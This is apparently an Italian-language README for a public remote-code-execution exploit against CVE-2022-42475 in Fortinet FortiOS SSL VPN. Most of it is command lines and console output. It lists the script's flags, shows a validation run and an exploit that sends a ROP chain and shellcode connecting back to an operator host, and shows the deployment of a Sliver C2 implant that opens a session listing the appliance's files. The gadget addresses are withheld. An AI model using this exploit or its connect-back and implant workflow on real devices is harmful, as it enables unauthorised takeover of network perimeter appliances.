
Un exploit per CVE-2022-42475, un heap overflow pre-autenticazione nei prodotti di rete Fortinet
Questo è l'exploit per il post del blog qui: https://bishopfox.com/blog/exploit-cve-2022-42475
Questa versione dell'exploit non funzionerà senza che tu, l'hacker, fornisca gli indirizzi di memoria necessari per i gadget ROP, ecc. Il lavoro per determinare questi dati è riservato e di proprietà di Bishop Fox e io non pubblicherò (non posso) pubblicarlo insieme a questo exploit. Confido che tu capisca!
execve(binary_file).Nota: Al momento la modalità 'solo validazione' funziona su tutte le versioni note di FortiOS. Tuttavia, gli exploit funzionano solo contro FortiOS 6.0.4 su hardware 100D. Non lavoro più presso BF e quindi non posso pubblicare l'exploit esteso che supporta qualcosa come 18k target.
pip3 install PyCrypto
pip3 install pycryptodome
Questo non tenterà di sfruttare il bug, ma lo innescherà come un crash (il demone SSL VPN remoto si riavvia automaticamente e immediatamente). Il crash viene rilevato euristicamente e segnalato all'operatore.
Eseguilo usando il flag di validazione -v:
$ ./x.py -t 192.168.0.10 -p 8443 -v
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Running in validate-only mode. No RCE.
[>] Testing to see if target is vulnerable (may take 10 seconds)
[+] Target '192.168.0.10:8443' appears to be VULNERABLE
Questo innescherà il bug, distribuirà una catena ROP e salterà allo shellcode. Lo shellcode è benigno e funziona come segue:
0xbf/tmp/x sull'appliance FortiGate0xbf all'exploit se la decrittografia del payload è riuscitaFlags:
-t host/IP del target
-p porta del target
-e modalità exploit
-c modalità solo connessione di ritorno
-H e -P IP:porta dell'operatore (richiesto)
-s versione software di FortiOS (richiesto)
-m modello hardware su cui gira FortiOS
-d attiva debug
Un esempio in cui selezioniamo sia la versione software 6.0.4 che il modello appliance 100D:
┌──(kali㉿kali)-[/mnt/hgfs/fortios/CVE-2022-42475]
└─$ sudo ./x.py -t 192.168.0.10 -p 8443 -e -c -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D 130 ⨯
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Generating random 128-bit AES key to encrypt payload
[+] Encrypting payload...
[+] Using cached shellcode. Edit ./x.py (look for 'shellcode.s') to force refresh.
[+] Configured for connect-back to 192.168.0.99:443
[+] Starting encrypted payload listener...
[+] Preparing for exploit...
[+] Sending request!
[+] Importing gadgets from 'exploit_data.json'
[<] Listener bound to port 443, waiting for connect-back...
[+] Validating gadgets...
[!] No functional hardware models were defined for FortiOS '5.2.14'. Removed.
[!] No functional hardware models were defined for FortiOS '5.6.9'. Removed.
[+] Imported 797 targets:
[-] 6.0.4 [ 1 targets ] <=== 100D
[-] 5.2.14 [ 47 targets ]
[-] 5.6.9 [ 60 targets ]
[-] 6.0.13 [ 68 targets ]
[-] 6.0.14 [ 67 targets ]
[-] 6.0.15 [ 58 targets ]
[-] 6.0.8 [ 67 targets ]
[-] 6.2.11 [ 69 targets ]
[-] 6.2.7 [ 75 targets ]
[-] 6.4.10 [ 71 targets ]
[-] 6.4.2 [ 62 targets ]
[-] 6.4.3 [ 61 targets ]
[-] 6.4.6 [ 73 targets ]
[-] 6.4.9 [ 72 targets ]
[-] 7.0.4 [ 53 targets ]
[+] Starting exploit
[<] Incoming request from 192.168.0.10:22470
[<] Received hello packet from target!! Model #: 100D
[<] Sending encrypted payload of 36 bytes
[<] Finished sending payload (36 bytes), waiting for response...
[<] Received the expected response ('100D') from 192.168.0.10
[<] Target is VULNERABLE with 100% confidence.
[+] All done!
Se ometti -m per scegliere un modello hardware, l'exploit farà brute-force su tutti i target hardware per la versione software specificata.
0xbf/tmp/x0xbf all'exploitexecve("/tmp/x")Flags:
-t host/IP del target
-p porta del target
-e modalità exploit
-f filename /percorso/del/binario/da/execve/sul/target
-H e -P IP:porta dell'operatore per connessione di ritorno (richiesto)
-s versione software di FortiOS (richiesto)
-m modello hardware su cui gira FortiOS
-d attiva debug
Sliver:
carl@pluto:~$ ./sliver-server_linux
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain living weapon
[*] Server v1.5.34 - d2a6fa8cd6cc029818dd8d9e4a039bdea8071ca2
[*] Welcome to the sliver shell, please type 'help' for options
[server] sliver > mtls -l 8888
[*] Starting mTLS listener ...
[*] Successfully started job #1
Exploit:
$ ./x.py -t 192.168.0.10 -p 8443 -e -f implant5 -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Exploit will attempt to execve("implant5") on the target
...
[<] Target is VULNERABLE with 100% confidence.
[+] All done.
E di nuovo in Sliver:
[*] Session d8d5344b implant5 - 192.168.0.10:3500 (Burnet) - linux/amd64 - Mon, 06 Mar 2023 22:18:30 MST
[server] sliver > use d8d5344b-c666-4c60-9e33-5ce50eb82cad
[*] Active session implant5 (d8d5344b-c666-4c60-9e33-5ce50eb82cad)
[server] sliver (implant5) > whoami
Logon ID: <err>
[server] sliver (implant5) > ls
/ (19 items, 10.0 KiB)
======================
-rw-r--r-- .ash_history 590 B Tue Jan 31 11:31:57 +0000 2023
drwxr-xr-x bin <dir> Tue Jan 31 11:04:35 +0000 2023
drwxr-xr-x data <dir> Tue Jan 31 05:24:10 +0000 2023
drwxr-xr-x data2 <dir> Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x dev <dir> Tue Jan 31 05:26:16 +0000 2023
Lrwxrwxrwx etc -> data/etc 8 B Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx fortidev -> / 1 B Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx init -> /sbin/init 10 B Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x lib <dir> Mon Jan 07 18:03:30 +0000 2019
Lrwxrwxrwx lib64 -> lib 3 B Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x migadmin <dir> Tue Jan 31 05:23:26 +0000 2023
dr-xr-xr-x proc <dir> Tue Jan 31 05:23:13 +0000 2023
drwx------ root <dir> Mon Jan 07 17:17:34 +0000 2019
drwxr-xr-x sbin <dir> Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x security-rating <dir> Mon Jan 07 18:01:04 +0000 2019
drwxr-xr-x sys <dir> Tue Jan 31 05:23:27 +0000 2023
dtrwxrwxrwx tmp <dir> Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x usr <dir> Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x var <dir> Tue Jan 31 05:24:07 +0000 2023
Nota che Sliver restituisce <err> perché FortiOS è più o meno come Linux, e non funziona sempre come ci si aspetterebbe. Questo è un problema di FortiOS, non di Sliver.
Non lavoro più presso Bishop Fox, quindi dovrai seguire il github di BF per aggiornamenti su questo.